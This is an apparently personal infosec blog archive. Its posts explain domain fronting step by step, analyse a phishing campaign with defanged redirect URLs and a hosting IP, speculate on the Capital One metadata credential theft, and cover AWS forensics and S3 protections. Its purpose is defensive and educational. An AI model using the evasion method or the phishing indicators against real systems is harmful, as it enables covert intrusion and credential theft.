So long, Cisco! Why I am purposefully letting my CCNP expire

Hi friends! Cisco sent me this letter letting me know my CCNP/CCNA will expire.

I am letting it expire. Here is why.

My goals have changed. I got my CCNP in back 2002 and renewed it several times. I spent the first part of my career as an aspiring Network Engineer. Letting go of it now is a little sad.  My journey as a Net Eng led me into Information Security. As a Security Engineer, I do think is important to understand and keep current on routing concepts, like BGP and routing in the Cloud. Last year, I sat the AWS Networking Specialty Exam. Moving forward,  I’d rather spend my precious study hours on Certifications that make me better at my job, like Kali Linux Certified Professional and OSCP, as opposed to re-doing a Cisco Test on Spanning-Tree.

The world has changed. There once was a time where every small and medium sized company NEEDED Cisco Routers and Switches!  There was a time when many companies ran their own data centers. Some still do, yes – but the shift to public Cloud has clearly happened. Cloud is where the expertise is needed today and in the future.  There is still a need for Cisco Certified Professionals, but this need will be helping a slice of the Fortune 500 who choose to run on-prem networking or internal, private clouds. Government and Large telcos will probably leverage Cisco gear for a long time as well. Please understand, I am not saying Cisco Certs are no longer needed, because they are – it’s just that the playing field is different today.

Cisco’s CCNP has not changed. (much) I wrested with this before – Check out my post from three years ago. The switching test today is pretty much the same as it was then. The 300-155 Switch test is old – they only update it every three years. Good news is that the three year cycle is up and  Cisco is updating the CCNP tests in 202o, however, but still – how much of this content will still focus on legacy data center tech?

There is a Cisco CCNP Cloud certifcation – but this track  focuses on Cisco Cloud Tech only, with tech like unified fabric, UCS, ACI, etc..  Cisco Cloud is different than the Google, Azure, Ali and AWS public cloud offerings.  Cisco cloud technology focuses on empowering orgs to run their own internal clouds.   Again, there is a need for private cloud tech, but how great a need?

In conclusion, because of my professional path, the direction of technology and the direction of Cisco, I am not pursuing renewing my CCNP. I will spend time on other certifications instead.

I must say that Cisco was a huge help to me in the start of my career and I feel gratitude toward the folks there who ran the certification program in the early days, helping Engineers like me get skills needed + get acknowledged and recognized. I am grateful. Thank you, Cisco.

Note: This blog and the opinions in it are 100% my own, and in no way reflect those of any present or previous employer.  This blog is not associated with any company.

Posted in Uncategorized | Leave a comment

NGINX Moscow Office Raided!

Hi friends. I received an interesting letter from: Gus Robertson <gus.robertson@nginx.com> letting me know that NGINX’s Moscow office was raided by Police!!!

 

This referenced ZDNET Article corroborates the email.  Also, here is a link to a photo of the search warrant, that was originally posted on twitter.

Between those two links, you have most the details surrounding the raid. However, what is not in those two links – I will comment on + dive into a bit here:

What makes this whole thing is interesting about this is that F5 now owns NGINX. It is eyebrow raising where F5 says in the letter that they are “not a party” to the intellectual property that is in dispute. Well, what is the IP exactly?

From ZDNET  “The Moscow police executed the raid after last week the Rambler Group filed a copyright violation against NGINX Inc., claiming full ownership of the NGINX web server code

When F5 bought NGINX, did they not also not purchase the referenced disputed IP? This is not clear to me why F5 would say they are “not a party”. Maybe some corporate veil between F5 and NGINX gives them the right to legally state that. AND/OR . . . they may be attempting to keep the F5 name squeaky clean and not tie F5 name and F5 software to Russia and Russians. Damage control.

The other interesting part about the letter I received is that F5 only took measure to secure the master builds for NGINX products AFTER THE RAID. That’s basically saying that all master builds of referenced NGINX products were not secure prior to the raid. Is there any other way to read that?

What is not said in their letter is interesting…

1. According to ZDNET, “Equipment was seized and employees were detained for questioning“. Equipment was seized. If I am a customer, was any of MY data seized? That would seem to be priority one for F5 to let customers know this if they have not done so.

2. Although the letter states that none of the master builds are not on Russia servers ( at the time of the letter was crafted? ). Were the Master builds of the mentioned products on Russian Servers BEFORE the raid?

3. Why did F5 not tell customers that all of the MD5 file hashes of all the build files, from both pre and post raid, were in fact, the same?

The fact that F5 is saying that the master builds were not secure prior to this raid really bothers me. I know some of the builds may have been open source, but NGINX Plus, UNIT and WAF are not, ( which are all referenced in the letter).

It will be interesting to watch this play out..

Note: This blog and the opinions in it are 100% my own, and in no way reflect those of any present or previous employer.  This blog is not associated with any company.

 

Posted in Uncategorized | Leave a comment

How Domain Fronting Attacks work. Explained in seven steps

Domain Fronting Attacks were on of the top 5 attacks listed in material that came out of the RSA 2019 Conference as a way for attackers to obfuscate their activities. This was of high interest to me, so I dug in.

Formally, Domain Fronting is a technique leveraged by threat actors to use high reputation domains to disguise C2 callbacks from both the user and security tool sets.

Domain Fronting attacks work in Cloud Distribution Networks, (CDNs). CDNs are leveraged by companies who want to put themselves ‘closer’ to the customer and thus will allow the CDN to cache specific elements of the application on CDN owned Points of Presence(POPs) that are geographically close to the customer base. To do this, the CDN will also host the SSL Web Certificate of the Domain.  This is where we get started.

1. Attacker sets up their own server on the same CDN as the target company, (the target company is the company whose legitimate SSL Certificate is intended to disguise callbacks to the attacker’s C2 network).  For an example, let’s say the legitimate domain with a SSL cert is Henson.com hosted on a CDN. Attackers server is on the same CDN.

2. Initial Malware callback to legitimate domain. Attacker’s malware that is resident on any internal corporate network(that got there via phishing / or other means), makes its initial callback. However, the callback does not go to attacker owned domain, instead the callback goes to the a legitimate domain, Henson.com, hosted on the CDN. This step simply sets up TLS session between Malware endpoint and Henson.com property on the CDN.

3. User and Security Tools are fooled. The DNS resolution and the following call looks like any other web call to a legitimate domain, and the browser trusts the certificate.

4. Malware makes a second call to the attacker owned resource in the same CDN as Henson.com, hidden via the http 1.1 host header inside the valid TLS connection.

5. Request is routed. CDN fronts this second request as it is for Henson.com, but next it unwraps the TLS header, it reads the http 1.1 host header and re-routes request to the attacker’s server on the CDN.

6.  Another Re-direct. The attacker, not wanting their activity to be discovered by the CDN, simply has their server in the CDN do a second re-direct to an off-CDN command and control server anywhere in the world. From the CDN point of view, Nothing nefarious there, just a redirect . . .

7. The Command and Control Channel is set up. At this point, the redirect to the off-CDN command and control completes, so the full C2 is set up:

 Infected Host inside corp network -> CDN -> Henson.com on CDN -> Attacker's re-direct server on CDN > Attacker C2.  and completely hidden.

Defending Against Domain Fronting

As a Security Defender, your best defense against Domain Fronting is to have a proxy server for all your internet connections leaving your corporate network that is configured for TLS interception.  You can configure your proxy server to ensure the http 1.1 host header matches the domain that is in the URL. If the domain does not match, you can overwrite it, log (and alert) on the action.

Another defense technique to think about is to ensure you don’t have any dangling DNS / CDN fronted resources that the CDN would route to an origin host that is no longer present.

Also, taking several steps back, it was assumed that malware was present; and was making a callback. Strong host security, code signing, and application white listing can help prevent malware from running in the first place.

Stay safe, friends!

 

Disclaimer: This blog is private and independent. This blog not is associated with AWS or Amazon in any way.
Posted in Cyber Security, Phishing, RSA, Technical | Leave a comment

Is Azure lowering the bar on their certification exams?

Hi friends. I want to take a different approach today and offer some a speculation on something I saw which caught my eye. This is only speculation, so as you read, please keep this in mind.

Scrolling through LinkedIn on my phone, I came across this post, which I have pasted below: (identity of the source of the post removed purposefully )

Anything strike you as strange here? As  you know, it was announced publicly last weekend that Microsoft won the JEDI contract.

My theory is this: Microsoft recently re-graded tests on a lower curve to increase the number of Azure Certified individuals.  Perhaps to support JEDI initiative? The timing of the Contract award and the above post seem coincidental, but hey… maybe I am just a paranoid Security guy.

At present there are no good data sources with actual current certification counts to put some data behind the theory. However, according to a recent Cloud Security Alliance (CSA) report , AWS is the most popular public cloud infrastructure platform, comprising 41.5% of application workloads in the public cloud.

Therefore, it would stand to reason there are MORE AWS certified individuals than Azure Certified individuals to support the cloud workloads. Microsoft simply may be trying to level the talent playing field by retroactively re-grading exams.

The Azure Certification program hit some bumps last year as well and Microsoft  re-vamped its Azure Certification Program after getting feedback  from the community that the tests were “too broad”.

Okay, it’s time to end  ‘theory hour’ and get back to working on facts. Stay safe!

 

Disclaimer: This blog is private and independent. This blog not is associated with AWS or Amazon in any way. The opinions of this blog are my own NOT those of Amazon.
Posted in Azure Certification | Leave a comment

New GuardDuty Alerts worth mentioning

Amazon recently added a few notable alert types to help mitigate against some known attack types. I have been following, studying and blogging on AWS GuardDuty since it was released and it is amazing to watch the innovation happen in this product since its inception.

The first new alert is:

UnauthorizedAccess:EC2/MetadataDNSRebind

is interesting because it is designed to mitigate against attacks very similar to the recent Capitol One attack, where the attacker queried EC2 metadata service as one of the key steps in the attack kill chain. Put simply, this alert will fire when an EC2 instance in your AWS environment is querying a domain that resolves to the EC2 metadata IP address 169.254.169.254.

Per Amazon, “A DNS query of this kind may indicate that the instance is a target of a DNS Rebinding technique which can be used to obtain metadata from an EC2 instance, including the IAM credentials associated with the instance.

The second alert, (with very descriptive name)

Stealth:IAMUser/S3ServerAccessLoggingDisabled

basically does exactly that – tells you that someone shut off s3 server access logging on a particular bucket. I imagine the false positives with this would be low, there are not many reasons to disable this on a bucket, except in cases where someone may have billing shock, or the bucket is being decommissioned. Otherwise, a strong indicator of bucket tampering. Enabling this alert would help detect if someone is uploading bad stuff to your bucket, such as in this attack, where the threat actors added malicious code to s3 buckets to be served on websites.

Last, this alert falls in the same category of Bucket Tampering:

Policy:IAMUser/S3BlockPublicAccessDisabled

Same deal here, this one basically says that ‘your bucket is public now’, (where is was not before). This is to mitigate against data exfiltration, where a bucket could be leveraged as a temporary storehouse before moving data out of the company completely.

Enjoy and Stay Safe!

Disclaimer: This blog is private and independent. This blog not is associated with AWS or Amazon in any way.

 

 

 

 

Posted in Uncategorized | Leave a comment

The SalsaCentralDenver Phishing Campaign – Exclusive

Sometime on or before Friday, October 18th, the email account belonging to Denver Salsa Central had been compromised.

What is not in their courtesy notice is that the attacker(s) leveraged the info@SalsaCentralDenver email account to initiate a phishing campaign.  By sending phish emails from this domain, SPAM filters would likely not match existing blacklists and flag the phish. I know it got through gmail’s SPAM filter.

Here are screen shots of the three Phishing emails, pretending to be notifications from Amazon, American Express and Chase. All of these arrived within a few minutes of each other.  Take a look just below.  The email address where these phish are sourced are info@salsacentraldenver.com

 

The hook links [ middle button on each phish ]  are similar, all going to the rs6.net domain:

Fake Chase:
hxxp://r20.rs6.net/tn.jsp?f=001JXpTPVvaw8Za5wyc1tOV4IIhr1iiO8uXOX87_fRPtuJwbDK_vDhnf4HwdFkGvSGRscR_ng0dB0JFoiI5CKok1-6r0jbU8WZmt8GKLYtPhQJWMMynae3b8SVzdB64k1mK9Pn0GgiHAGT1kVux-WnfAU8aVfStiVYO&c=xxAs40ZUomXSX50x5PKouuoDD1CCTH6LmgL9CIvuC2zDIV7TuHfVGw==&ch=VngmDcyiYPxmM6aPlukgrMJvhmrUlm7hD5GS1o7_RCgNuNFtM098Kw==
Fake Amazon: 
hxxp://r20.rs6.net/tn.jsp?f=001DxKEhl7FukUIG9W_XeNKfQPgYA9tL1aW7OH0SV0OWC8K8kCWWZEhxxMjdmdkNCYC3fJ879jKnJ2-7uQbdVuRp0nVIUhH3CRVz2lofPLxGdSWxu25PqUHq51QnWbsSxjOgdHozJNVkQn1QE-OqpoQ_ggef2aO76ju&c=omRnvkKXUlD65znA5wavcPaptpm3fezuTe8WLpm7GHcsbL4Eutqizg==&ch=w2FTck3mc9gPFnwErfcKfSpEbl8mYFGCyCO6vruOtRKwhIqtQszjrA==
Fake American Express:
hxxp://r20.rs6.net/tn.jsp?f=001Aml9EoWQ0-q8cJjCstWSyaC_dOeY8h6R3Tb-l49kHQanU3nI0FnQJahiWHyc_3C0yQmuBAV79HS5N9IpQguXghqMEKJKIw6q2Ab6gII-27zn3xQkTWiigeLBB41nLr31QeQ6IF5SHWgALNPxNj96EQ==&c=OacERVHNGaWMdOx_kyHBrz5Ip90v2h2_NtQyKNpsMgkeTMcDogp0PA==&ch=YHjVBwhFVH0IPJHnwpxit_w76o9betL9tcYy5aqlP3J3m5emxZX4Jw==

This is where is gets weird. A whois for rs6.net shows it belongs to markmonintor.com

MarkMonitor appears to be a reputable Security company, but the emails came from a known account hack. Why would the hackers go through the trouble of compromising an email account to only redirect it to a supposedly legit Phishing / Fraud company?  It gets even stranger when I open a sandbox vm and follow one of the links. Keep reading

So… I turn on a pcap on my sandbox vm and follow the fake Amazon link:

Fake Amazon: hxxp://r20.rs6.net/tn.jsp?f=001DxKEhl7FukUIG9W_XeNKfQPgYA9tL1aW7OH0SV0OWC8K8kCWWZEhxxMjdmdkNCYC3fJ879jKnJ2-7uQbdVuRp0nVIUhH3CRVz2lofPLxGdSWxu25PqUHq51QnWbsSxjOgdHozJNVkQn1QE-OqpoQ_ggef2aO76ju&c=omRnvkKXUlD65znA5wavcPaptpm3fezuTe8WLpm7GHcsbL4Eutqizg==&ch=w2FTck3mc9gPFnwErfcKfSpEbl8mYFGCyCO6vruOtRKwhIqtQszjrA==

I am first redirected by the MarkMonitor owned domain to a new domain, hxxp://81-op-0-1.com

And ..

Seems the only purpose of this redirect is to be redirecting again, to the hxxp://02-02.002.com. Obfuscation?

From my capture, I see the DNS name resolution resolving 02-02-002.com to 143.95.237.93

which is owned by Athenix, which is important since this IP is actually hosting the fake stuff, which you’ll see when you keep reading.

The hxxp://02-02-002.com link takes me to a copy of the real amazon site:

Ok – all of that noted, lets get on with giving these guys what they want. When I get to the page, the fake amazon is asking for me for my email, so I make up something and put it in

Next, I am presented with my second screen, so I make some stuff up and fill this out as well.

Oh, not done, Screen number three, this is where it gets good. They want my credit card number. Now I am thinking I wonder what all of this has to do with MarkMonitor?

The form works and its actually uploading my data. A sniff of the http post req shows these the POST with “my credit card”

After hitting continue.. more stuff.. they want the password to the email account I originally supplied.  Sure.. let’s give them access…

After hitting Continue one more time.. I am actually redirected to the the REAL Amazon.com!!!!

This is a real Phish alright. These guys asked for email account + password,  and my credit card. So did why did MarkMonitor  just collect PCI and PII data from me? They didnt. The fakes sites are all hosted at 02-02-002.com. I think MarkMonitor has lost control of one of their subdomains. The Hacker placed the first redirect

 

Stay tuned for more + Stay safe!

 

 

 

 

 

 

 

 

Posted in Phishing | Leave a comment

Two handy AWS API Calls useful for Forensics

A little while ago, I wrote a blog on how to use Lambda to shut down a compromised instance . The idea behind this was a way to quickly detect and remediate an instance which AWS GuardDuty Intrusion Detection flagged as infected.

To add the ability to do a Forensic Investigation to the automation, take a look at a couple more API calls to add to your function.

For volume forensics, create a forensic volume snapshot after your instance is stopped

aws ec2 create-snapshot --volume-id vol-1234567890abcdef0 --description "This is my root volume snapshot

or Python

ec2 = boto3.resource('ec2')
snapshot = ec2.Snapshot('vol-1234567890abcdef0')

The snapshot allows you to investigate the volume and not compromise the evidence ( original volume ) in an investigation.

For memory Forensics, think about automation to Hibernate the instance. Yes, instead of stopping the instance, if you are running certain flavors of linux, ( e.g. instance meets the prerequisites for hibernation ), can instead place the instance into hibernation .

Per AWS What happens when an instance is hibernated:

“When you hibernate an instance, we signal the operating system to perform hibernation (suspend-to-disk), which saves the contents from the instance memory (RAM) to your Amazon EBS root volume. We persist the instance’s Amazon EBS root volume and any attached Amazon EBS data volumes. When you restart your instance, the Amazon EBS root volume is restored to its previous state, the RAM contents are reloaded, and the processes that were previously running on the instance are resumed. Previously attached data volumes are reattached and the instance retains its instance ID. “

For CLI:

The instance has be to run with Hibernation on:

aws ec2 run-instances --image-id ami-0abcdef1234567890 --instance-type m5.large --hibernation-options Configured=true --count 1 --key-name MyKeyPair

and the Hibernate is a parameter on stop-instances  . . .

aws ec2 stop-instances --instance-ids i-1234567890abcdef0 --hibernate

This feature was released about a year ago, and as you can see, only supports limited instance and volume types, however it is great for Forensics on memory resident malware.

Additional Forensic information

EC2 Forensics SANS Paper

Digital Forensics AWS Paper

Incident Response in AWS BlackHat Paper

Top 3 Open Source tools for AWS Incident Response

 

Stay Safe Friends!

Posted in Uncategorized | Leave a comment

The importance of Scope and Rules of Engagement in a Penetration Test

Hi friends! An interesting story appeared on theregister.co.uk about a pair of Professional Penetration Testers getting arrested after attempting a physical break-in at their client’s building.

Crazy, right? The core of the story is that, YES –  they were hired by this client to engage in a penetration test to access computer records, however, the client apparently did not sanction testing physical security controls as part of the test.

Often times, too much emphasis is put on the excitement of running an exploit and gaining a foot-hold in a network, finding the goods / capturing the flag as it were… and no one seems to be having the conversations about preparedness. You know, all of the things that happen before a pen-test.

Rule 1 is Get Permission before doing anything pentest related. This is in the form of a legal contract between you and the client. (If its your own company, having formal sign-off at an Senior Executive level )

Rule 2 is Determine and Document Scope of the Test. The outcome of this workflow will actually be referenced as part of the permission document in Rule 1. Scope is simply, in a broad sense, is what you are allowed to do as a Pentester.  What networks are you testing against? What hosts? Only internal parts of the network? Is Social Engineering allowed as part of this test? Is this a black box(secret) pentest or is a whitebox pentest, where the Building Security and IT Security Team knows what’s up? Am I allowed to plug in equipment to the network? Am I testing in DEV, TEST or PROD environment? Are physical Security controls at the facility housing the computer system in scope? These questions are not all-encompassing, but provide a decent example –  You get the idea here. The scoping document is signed off by all Executive parties (Legal) and is apparently what the two afore mentioned gentlemen did not have in their engagement.

From the referenced Article: “The bureaucrats were, however, unaware the tests could also involve physical break-ins, it is claimed.”

Rule 3 is to Determine Rules of Engagement. Well, Chris, you just said if they had a scoping document, everything would be ok, what gives?  Rules of Engagement guides the Pentester’s actions when specific findings, events or circumstances occur during a test.

For the above reference. The Rules of Engagement document would state, that if a Physical Alarm is tripped, then the Pentester must approach building Security building Security must verify the PenTester’s Identity and then call the Sheriff and let them know this was a Security Exercise. Or if this was a silent alarm, protocol might have been to display a temporary badge to the arresting officers and a phone number of a Senior Executive who could be contacted to verify identities if needed.

More specifically though, What happens if a critical (unexpected) finding is uncovered that puts the company at risk? Do we stop the Pentest?  If I see a vulnerability on a box, can I run a metasploit script against it? Or do I just report that vulnerability. If I run an explout on a box and it breaks the box, what do I do? Rules of Engagement tells me this.  You get the idea.

I don’t think our friends had this one sorted out either; as there appeared to be no protocol for the Pentesters to rely upon when the Police showed up… that would have kept the testers out of jail. And no protocol for Building Security/Alarm Company (other than to call the Police).

So, the take-away… Definitely spend your time making sure you, your team and the client are on the same page with regards to all aspects and details of the Penetration test!

You can find the Official Scoping and Rules of Engagements worksheets here:

https://pen-testing.sans.org/resources/downloads

And NEVER NEVER run a test without (written, legal) permission. Verbal will not do. Ever.

Stay safe, friends!

 

 

 

 

 

 

 

Posted in Uncategorized | Leave a comment

Capitol One Breach: Henson’s take + preventing and detecting

There has been lots of media coverage on the recent Capitol One hack. I have not been able to find a great technical write up on the hack, however.  In this post, I hypothesize what happened based on data that has been publicly released.

The Legal Complaint against the accused has the following summary:

“A Firewall Misconfiguration permitted commands to reach and be executed by that server, which enabled access to folders or buckets of data in Capitol One’s Storage space at the Cloud Computing Company”

“..the first command, when executed, obtained security credentials for an account known as ****-WAF-Role, that in turn enabled access to certain of Capitol One’s Folders at the Cloud Computing Company”

“..the second command, when executed used the ****-WAF-Role account to list the names of the folders or buckets..”

“…the third command (the Sync Command) when executed, used the ****-WAF Role to extract or copy data from those folders or buckets.. ”

Lets speculate on that Firewall(WAF) misconfiguration in the first quote.  Assuming the WAF is running on an ‘instance’.  The WAF misconfiguration could have been some stale or default credentials, combined with a management interface that was assigned a public IP address that visibile to the world.

Speculating on the first command, once inside the Firewall, some type of command line access was obtained and a call was issued to the Cloud Provider’s metadata endpoint, which provides information about that instance – and temporary access keys could have been derived from that data.  If the ephemeral keys were obtained,  then the subsequent programmatic calls to list buckets and sync would have been permitted.

How could this have been detected?

Much of my writing to this point has been speculative, but we do know this one fact, there was a download.

Yes, to me the big call out to detection here is that the reports say that 30 GB of data was moved.

To do this kind of data movement, you’d need a persistent connection.  We also know the hacker was using a VPN, so that persistent connection was encrypted.  Third, the client IP of the VPN is an IP that Capitol One does not own. Those three metrics provide a sweet KPI for detecting unauthorized downloads:

1. Persistent connection moving significant data

2. Connection is encrypted with keys not owned by the company

3. Connection is traversing to an IP not owned by the company.

If you are monitoring your traffic either by mirroring traffic to a Security Tool that can look for these metrics, or using  ML built into IDS/IPS systems, the above KPI is one for InfoSec first responders to watch for and investigate.

Detection is a must! Prevention, we do our best.

Preventing an attack like this would come down to Principle of Least Privilege. (you thought I was going to say to fix the firewall, right? ) Really, it is fixing permissions for the instance on which the firewall is running. For instance, the WAF instance in question would not need a role that could:

1. Access Folders/Buckets directly

2.Assume another Role that could access folders and buckets directly.

So, a lot of that is locking down those privileges and understanding what each policy does when it is assigned to a principle. Combing through all those with a fine tooth comb is a key part of an Enterprise Identity Access Management Program.

Netflix takes an automated approach to this with a couple of tools RepoKid and Aardvark. In short the tools proactively examine the environment and look at permissions that used; and then automatically trims away any that are not needed.  Take a look!

I hope this was helpful to you.

Stay safe, friends!

The opinions of this blog do not necessarily reflect that of Amazon. This blog is not an official publication of Amazon or associated with Amazon.com.

 

 

 

 

 

Posted in Uncategorized | Leave a comment

Resources for Protecting against Public S3 Bucket Exposure

Hi friends – its been a while. My new gig is kicking my butt! Growing and learning quite a lot, for sure. I need to keep good information coming out, so when I saw this story about third-party developed Facebook app datasets being exposed due to a mis-configured bucket permission, I felt compelled to put together some ways to help remediate this.

Although ACLs and Bucket policies are great for protecting against leaky buckets for those who understand AWS and IAM very well,  they are not something one would understand in 30 seconds – so I think some people avoid learning them to simply get their jobs done fast.  Also, I think there is a general lack of Security awareness in the wild, so people do things to get a job done quickly without thinking through the implications of what they are doing… making buckets public. I believe that these two reasons are at dead center of all of the bucket leaks you read about in the papers.  

First, let’s talk about detecting public buckets.

AWS has done a good job adding additional methods to detect public buckets. A year or so ago this little icon appeared in the console next to any public bucket when looking at your buckets in S3 menu:

So it made it a bit more obvious, but that still was not enough. AWS made it so Trusted Advisor Reports could check S3 Access and Flag buckets.

Also, to take a quick detour into the inventory aspect of Info Security, think about leveraging Amazon Macie for detecting certain data types (PII) are in S3 buckets and how that data is being accessed.

That’s nice, but let’s take some actions . .

Next, you can integrate Trusted Advisor with CloudWatch, so you can take actions on Trusted Advisor’s checks, but this will only fire AFTER Trusted Advisor has ran….so still not quite enough to stop bucket leaks that would occur in-between the times TA is run.

Next level up, and one of my favorites, is using AWS Config to monitor and respond to public buckets – this is powerful because it requires no human interaction…. almost.  The Lambda script in the linked tutorial only notifies if a bucket permission has been changed. To fully automate I really recommend that you customize the script and add some teeth to it, so it will remediate the bucket policy. An example script is here.

Problem still not solved you say, a user should not even be allowed to set their own bucket permission? Could not agree more.. so…

I’d rather just prevent S3 Public Access in the first place.

Now, there is Amazon S3 block public access which gives the Account Administrator more power to block users from introducing ACLs with open permissions onto a bucket in the first place, by blocking this at the Account level.

And Last –  would sit a Corporate Security Policy about creating any kind of Public sharing on any Cloud or third party service without explicit permission from the Security Team. Education and acknowledgement of this policy by every employee yearly is a must.

I hope this helps! Stay Safe! Stay Secure!

The opinions of this blog do not necessarily reflect that of Amazon. This blog is not an official publication of Amazon or associated with Amazon.com.
Posted in Uncategorized | Leave a comment